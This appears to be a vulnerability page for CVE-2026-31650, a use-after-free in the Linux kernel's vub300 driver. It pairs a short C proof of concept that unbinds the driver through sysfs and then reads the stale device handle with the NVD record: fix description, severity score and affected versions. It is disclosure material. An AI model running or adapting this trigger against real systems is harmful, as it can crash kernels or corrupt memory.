CVE-2026-31650

/* * PoC for CVE-2026-31650 (Conceptual) * This PoC demonstrates the trigger condition for the use-after-free. * Requires a system with the vub300 hardware and vulnerable kernel. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define VUB300_IOCTL_MAGIC 0x92 int main() { // Step 1: Open the device to increment reference count int fd = open("/dev/vub300", O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } printf("Device opened. Reference count incremented.\n"); // Step 2: Simulate the unbind operation (usually requires root or specific sysfs access) // In a real exploit scenario, race condition is triggered here. // Writing to /sys/bus/usb/drivers/vub300/unbind FILE *unbind_fp = fopen("/sys/bus/usb/drivers/vub300/unbind", "w"); if (unbind_fp) { // Assume interface ID is known fprintf(unbind_fp, "1-1:1.0"); fclose(unbind_fp); printf("Driver unbind triggered.\n"); } // Step 3: If UAF exists, accessing 'fd' now may crash the kernel // or allow memory corruption. char buffer[64]; ssize_t bytes_read = read(fd, buffer, sizeof(buffer)); if (bytes_read < 0) { perror("Use-after-free triggered or device gone"); } else { printf("Read %zd bytes. System may still be vulnerable or patched.\n", bytes_read); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-31650", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:44.473", "lastModified": "2026-04-27T20:14:35.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: vub300: fix use-after-free on disconnect\n\nThe vub300 driver maintains an explicit reference count for the\ncontroller and its driver data and the last reference can in theory be\ndropped after the driver has been unbound.\n\nThis specifically means that the controller allocation must not be\ndevice managed as that can lead to use-after-free.\n\nNote that the lifetime is currently also incorrectly tied the parent USB\ndevice rather than interface, which can lead to memory leaks if the\ndriver is unbound without its device being physically disconnected (e.g.\non probe deferral).\n\nFix both issues by reverting to non-managed allocation of the controller."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.1", "versionEndExcluding": "6.18.23", "matchCriteriaId": "0DC92196-2D7B-4F07-A19F-B43E0624C441"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.13", "matchCriteriaId": "1490EF9B-9080-481C-8D22-1306AAE664E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:-:*:*:*:*:*:*", "matchCriteriaId": "7CC8B11D-82DC-4958-8DC7-BF5CC829A5E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/8f4d20a710225ec7a565f6a0459862d3b1f32330", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ea7468f61be033f4e18b95f2912010ed1d175d75", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ef0448c569b37ceabdd038e9faa311e5179127b0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}